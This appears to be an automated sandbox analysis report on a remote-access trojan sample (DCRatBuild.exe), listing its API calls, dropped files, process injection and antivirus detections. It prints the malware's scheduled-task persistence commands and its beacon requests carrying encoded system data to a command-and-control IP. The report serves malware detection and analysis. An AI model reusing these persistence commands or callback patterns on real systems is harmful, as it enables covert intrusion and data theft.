NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c6b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92da1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c7d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92daa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c7e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92df0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dae000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (4 events)

file	C:\BrokerMonitor\YaunL2sDbBHWXuwZCxWkball.bat
file	C:\Users\Public\pJ3dEqpH1A.bat
file	C:\BrokerMonitor\BrokerMonitorSessionbrokerNet.exe
file	C:\BrokerMonitor\UvLaqEk3BNeSNXAL5asuk.vbe

Creates a suspicious process (5 events)

cmdline	"schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\SchCache\Idle.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\KMService\explorer.exe'" /rl HIGHEST /f
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\Users\Public\pJ3dEqpH1A.bat"
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\LICENSE\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "KMService" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\KMService.exe'" /rl HIGHEST /f

Drops a binary and executes it (3 events)

file	C:\BrokerMonitor\UvLaqEk3BNeSNXAL5asuk.vbe
file	C:\BrokerMonitor\BrokerMonitorSessionbrokerNet.exe
file	C:\Users\Public\pJ3dEqpH1A.bat

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
ShellExecuteExW April 12, 2021, 10:42 a.m.	show_type: 0 filepath_r: C:/BrokerMonitor/YaunL2sDbBHWXuwZCxWkball.bat parameters: filepath: C:/BrokerMonitor/YaunL2sDbBHWXuwZCxWkball.bat	1	1
CreateProcessInternalW April 12, 2021, 10:42 a.m.	thread_identifier: 9024 thread_handle: 0x0000000000000370 process_identifier: 3724 current_directory: C:\BrokerMonitor filepath: track: 1 command_line: "schtasks" /create /tn "KMService" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\KMService.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000378	1	1
CreateProcessInternalW April 12, 2021, 10:42 a.m.	thread_identifier: 5168 thread_handle: 0x0000000000000380 process_identifier: 2196 current_directory: C:\BrokerMonitor filepath: track: 1 command_line: "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\LICENSE\pw.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000038c	1	1
CreateProcessInternalW April 12, 2021, 10:42 a.m.	thread_identifier: 1036 thread_handle: 0x0000000000000380 process_identifier: 7076 current_directory: C:\BrokerMonitor filepath: track: 1 command_line: "schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\SchCache\Idle.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000390	1	1
CreateProcessInternalW April 12, 2021, 10:42 a.m.	thread_identifier: 5860 thread_handle: 0x000000000000039c process_identifier: 5992 current_directory: C:\BrokerMonitor filepath: track: 1 command_line: "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\KMService\explorer.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000003a0	1	1
ShellExecuteExW April 12, 2021, 10:42 a.m.	show_type: 0 filepath_r: C:\Users\Public\pJ3dEqpH1A.bat parameters: filepath: C:\Users\Public\pJ3dEqpH1A.bat	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 12, 2021, 10:43 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 12, 2021, 10:42 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 12, 2021, 10:42 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 53 events)

description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Create a windows service	rule	create_service
description	Communications over UDP network	rule	network_udp_sock
description	Listen for incoming communication	rule	network_tcp_listen
description	Communications over P2P network	rule	network_p2p_win
description	Communications over HTTP	rule	network_http
description	File downloader/dropper	rule	network_dropper
description	Communications over FTP	rule	network_ftp
description	Communications over RAW socket	rule	network_tcp_socket
description	Communications use DNS	rule	network_dns
description	Communication using dga	rule	network_dga
description	Escalade priviledges	rule	escalate_priv
description	Take screenshot	rule	screenshot
description	Run a keylogger	rule	keylogger
description	Steal credential	rule	cred_local
description	Record Audio	rule	sniff_audio
description	APC queue tasks migration	rule	migrate_apc
description	Malware can spread east-west using share drive	rule	spreading_share
description	Create or check mutex	rule	win_mutex
description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_private_profile
description	Affect private profile	rule	win_files_operation
description	Match Winsock 2 API library declaration	rule	Str_Win32_Winsock2_Library
description	Match Windows Inet API library declaration	rule	Str_Win32_Wininet_Library
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_private_profile
description	Affect private profile	rule	win_files_operation
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context

Uses Windows utilities for basic Windows functionality (7 events)

cmdline	"schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\SchCache\Idle.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\KMService\explorer.exe'" /rl HIGHEST /f
cmdline	chcp 65001
cmdline	ping -n 5 localhost
cmdline	"C:\BrokerMonitor\BrokerMonitorSessionbrokerNet.exe"
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\LICENSE\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "KMService" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\KMService.exe'" /rl HIGHEST /f

Communicates with host for which no DNS query was performed (4 events)

host	131.153.76.130
host	172.217.25.14
host	82.146.59.236
host	193.218.118.85

Installs itself for autorun at Windows startup (4 events)

cmdline	"schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\SchCache\Idle.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\KMService\explorer.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\LICENSE\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "KMService" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\KMService.exe'" /rl HIGHEST /f

Network communications indicative of possible code injection originated from the process explorer.exe (7 events)

Time & API	Arguments	Status	Return
send April 12, 2021, 10:43 a.m.	buffer: GET /processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&46203bcc475d4509a3a86d65325f8855=d0f20e2b176e1456ae89e4aa36cdd07d&MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1 Host: 82.146.59.236 Connection: Keep-Alive socket: 1184 sent: 451	1	451
send April 12, 2021, 10:43 a.m.	buffer: GET /processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&aabb8f74bac12735e9499cd9c6b8baf5=365da4edf7808b477a8d10cbf7405c61&f53d57fa5ca170272892cd3c6aa17be0=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1 Host: 82.146.59.236 socket: 1184 sent: 515	1	515
send April 12, 2021, 10:43 a.m.	buffer: GET /processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&8132fb67618ecd9be106ef9ba3717022=QM5EjZxU2YjdTZykDNwQjN3YzN2IDNjlTZ0UzYwYWY2YmMlRDN0MGM5cjNwcTN2gjM0QzNwkDN&f53d57fa5ca170272892cd3c6aa17be0=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&095b88682a67bcf69516cfbd401a51e6=u4iL5J3b0NWZylGZgcmbp5mbhN2U&c5c532831db1a7dab19172319a0ff14a=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&c6dd1cba03876c3affd0f11b003ca4a6=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1 Host: 82.146.59.236 socket: 1184 sent: 741	1	741
send April 12, 2021, 10:43 a.m.	buffer: `s¥©èZ¡KÛ"t³Þ½ÄÞbRM!×¶æ2,Ã¿*</=5 À'ÀÀÀ+À#À,À$À À @2j8;ÿ ipinfo.io socket: 1364 sent: 151	1	151
send April 12, 2021, 10:43 a.m.	buffer: FBAx>unW²Q}8°õÕfZ3wÓÉü"óYm/qlL{¥iu(qWFñúN<vþ9Ø¿6õxËà"SS@,µÓk2ª}¬!IPÐ«:D¤æ¨Ú_ÅN êùûÍ\|6u ³Òb=;Öb`w!AÑxÊ¨{²*Â5õ socket: 1364 sent: 150	1	150
send April 12, 2021, 10:43 a.m.	buffer: f» ªÖÏÕï3á¡¸£\| ýFÇªÖÌ«¶(©ÑÚÕ×C5¡2Czn¾Ùâ.H¨÷ÔØï³1éÔH)V:æùÃAÇªB/Szíö±uþ_hpwsGÊ«hÐö'ù°bn±NÍ?àE=Ïßk© R)15L¸k¤Ue®SçE\|Ý±§Ò¸¤/ £)CñjÏKbä£¼ðûFäåóªoÇMáæç2<aôàÖ_ÓÝÿ«èÐðÚxÚLªaÉTäàH 8Ü¢½GÒTm'å»ãQ Xòa socket: 1364 sent: 277	1	277
send April 12, 2021, 10:43 a.m.	buffer: GET /processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&8132fb67618ecd9be106ef9ba3717022=QM5EjZxU2YjdTZykDNwQjN3YzN2IDNjlTZ0UzYwYWY2YmMlRDN0MGM5cjNwcTN2gjM0QzNwkDN&f53d57fa5ca170272892cd3c6aa17be0=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&daa9160ddf6ef6047103286e2afebca3=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&10f2fa0bda69a6c3f898819a603f080d=wYhRjY4cjZ0M2M0IGO2EGMycTN1QDMiVWZiNDZ1YzMlV2N0U2N0MjZ&095b88682a67bcf69516cfbd401a51e6=9JicldWYuFWTg0WYyd2byBlI6IydvRmbpdFVDFkIsISWiojIulWbkF0cpJCLi4kI6ISbhNmYld1cpJCLiklI6ISZu9Gaw9mcjlWTzlmIsIiI6IyRBRlIsICdpJEI0YDIOtEIsFmbvl2czVmZvJHUgcDIzd3bk5WaXJiOiIXZW5WaXJCL9JCa0VXYn5WazNXat9CXvlmLvZmbpBXavw1LcpzcwRHdoJiOiUWbkFWZyJCLiwWdvV2UvwVYpNXQiojIl52b6VWbpRnIsIiN4EzMwIiOiwWY0N3bwJCLi02bjVGblRFIhVmcvtEI2YzN0MVQiojInJ3biwiI0gzN54iNyEDLwYjN14yNzIiOiM2bsJCLiI1SiojI5JHduV3bjJCLiwWdvV2UiojIu9WanVmciwiIsV3blNlI6ISe0l2YiwiIwUTMuQzMx4COwIjL1cTMiojIwlmI7pjIvZmbJBXSiwiIyIDdzVGdiojIl1WYOJXZzVlIsIyQQ1iMyQ1UFRlI6ISZtFmTDBlIsICOuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&c5c532831db1a7dab19172319a0ff14a=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&c6dd1cba03876c3affd0f11b003ca4a6=QZ0gzYlVTY4YzN3QmMlRWNzQ2YxcjMhdTNmhDMkdTMlFTY5kjZ3gzM HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1 Host: 82.146.59.236 socket: 1184 sent: 1465	1	1465

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	C:/BrokerMonitor/YaunL2sDbBHWXuwZCxWkball.bat
parent_process	wscript.exe				martian_process	"C:\BrokerMonitor\YaunL2sDbBHWXuwZCxWkball.bat"

Attempts to remove evidence of file being downloaded from the Internet (4 events)

file	C:\Windows\KMService\explorer.exe:Zone.Identifier
file	C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\KMService.exe:Zone.Identifier
file	C:\Python27\LICENSE\pw.exe:Zone.Identifier
file	C:\Windows\SchCache\Idle.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 7388 resumed a thread in remote process 6192
Process injection	Process 4104 resumed a thread in remote process 1904
NtResumeThread April 12, 2021, 10:42 a.m.	thread_handle: 0x00000274 suspend_count: 1 process_identifier: 6192	1	0	0
NtResumeThread April 12, 2021, 10:42 a.m.	thread_handle: 0x000000000000000c suspend_count: 0 process_identifier: 1904	1	0	0

Created a process named as a common system process (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 12, 2021, 10:42 a.m.	thread_identifier: 2000 thread_handle: 0x000000000000000c process_identifier: 1904 current_directory: filepath: C:\Windows\KMService\explorer.exe track: 1 command_line: "C:\Windows\KMService\explorer.exe" filepath_r: C:\Windows\KMService\explorer.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

File has been identified by 43 AntiVirus engines on VirusTotal as malicious (43 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.36678561
McAfee	Artemis!775B36643D8D
Cylance	Unsafe
Zillya	Trojan.ScriptKD.JS.10
Sangfor	Trojan.MSIL.SpyNoon.RTU
Alibaba	TrojanSpy:MSIL/SpyNoon.7400a715
K7GW	Spyware ( 0056adb71 )
Cybereason	malicious.43d8de
Arcabit	Trojan.Generic.D22FABA1
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of MSIL/Spy.Agent.CVT
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Malware.Uztuby-9848412-0
Kaspersky	UDS:Trojan-Spy.MSIL.Stealer.gen
BitDefender	Trojan.GenericKD.36678561
Ad-Aware	Trojan.GenericKD.36678561
Emsisoft	Trojan.GenericKD.36678561 (B)
VIPRE	Trojan.Win32.Generic!BT
McAfee-GW-Edition	BehavesLike.Win32.Adware.dh
FireEye	Generic.mg.775b36643d8ded33
Sophos	Mal/Generic-S
Ikarus	Trojan.MSIL.Spy
Avira	TR/Spy.Agent.nsarn
Microsoft	Trojan:MSIL/SpyNoon.RTU!MTB
AegisLab	Trojan.MSIL.Stealer.l!c
GData	Trojan.GenericKD.36678561
Cynet	Malicious (score: 100)
ALYac	Trojan.GenericKD.36678561
MAX	malware (ai score=100)
Malwarebytes	Malware.AI.2849162964
Panda	Trj/CI.A
TrendMicro-HouseCall	TROJ_GEN.R002C0DDA21
Rising	Spyware.Agent!8.C6 (CLOUD)
SentinelOne	Static AI - Malicious SFX
Fortinet	MSIL/Agent.CVT!tr
BitDefenderTheta	Gen:NN.ZemsilF.34670.Nq0@aq@037ci
AVG	Win32:RATX-gen [Trj]
Avast	Win32:RATX-gen [Trj]
CrowdStrike	win/malicious_confidence_80% (W)
Qihoo-360	Win32/TrojanDropper.Uztuby.HwYDfWwA

DCRatBuild.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All